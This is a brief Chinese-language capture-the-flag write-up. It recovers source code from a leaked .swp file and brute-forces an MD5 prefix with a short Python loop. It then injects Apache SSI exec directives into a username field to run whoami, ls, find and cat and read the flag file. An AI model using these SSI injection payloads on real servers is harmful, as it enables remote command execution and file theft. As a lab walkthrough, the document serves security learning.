扫描到后台后index.php.swp文件泄露,访问一下得到源码
(反正我是没有扫到,wuwuwu~)
可以看到password的md5值的前六位要等于6d0bc1
不会写哈,用用别人的
import hashlib
for i in range(1000000000):
a = hashlib.md5(str(i).encode('utf-8')).hexdigest()
if a[0:6] == '6d0bc1':
print(i)
print(a)
抓包,看到有一个隐藏的url,是shtml
看到shtml,想到Apache SSI 远程命令执行漏洞,参考:https://cloud.tencent.com/developer/article/1540513
可以上传一个shtml文件,内容为
<!--#exec cmd="whoami" -->
但是这里没有可以上传文件的地方。
回顾一下整个流程,password是固定的值,唯一可控的地方就是username,尝试抓包后更改注入:
扫描当前目录
<!--#exec cmd="ls"-->
查看当前目录
<!--#exec cmd="pwd"-->
如果文件名叫flag***那么可以找文件
<!--#exec cmd="find / -type f -name flag*"-->
cat flag
<!--#exec cmd="cat /var/www/html/flag_990c66bf85a09c664f0b6741840499b2"-->
得到flag